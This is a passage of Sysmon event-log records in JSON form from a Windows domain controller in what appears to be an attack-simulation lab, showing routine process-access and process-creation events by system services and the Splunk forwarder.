05:46:52.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2253,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:52.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:52.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2254,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:52.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:52.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2255,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:52.453\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01CC-5F25-0000-001055120400}\r\nTargetProcessId: 3756\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:52.453","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01CC-5F25-0000-001055120400}","TargetProcessId":"3756","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2256,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:52.469\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01CC-5F25-0000-001055120400}\r\nTargetProcessId: 3756\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:52.469","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01CC-5F25-0000-001055120400}","TargetProcessId":"3756","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2257,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:53.162\r\nProcessGuid: {A837DB8D-01CD-5F25-0000-001074140400}\r\nProcessId: 3816\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:53.162","ProcessGuid":"{A837DB8D-01CD-5F25-0000-001074140400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:46:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2258,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:53.344\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 4056\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-01CD-5F25-0000-001074140400}\r\nTargetProcessId: 3816\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:53.344","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"4056","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-01CD-5F25-0000-001074140400}","TargetProcessId":"3816","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2259,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:53.344\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01CD-5F25-0000-001074140400}\r\nTargetProcessId: 3816\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:53.344","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01CD-5F25-0000-001074140400}","TargetProcessId":"3816","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2260,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:53.344\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:53.344","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2261,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:53.344\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 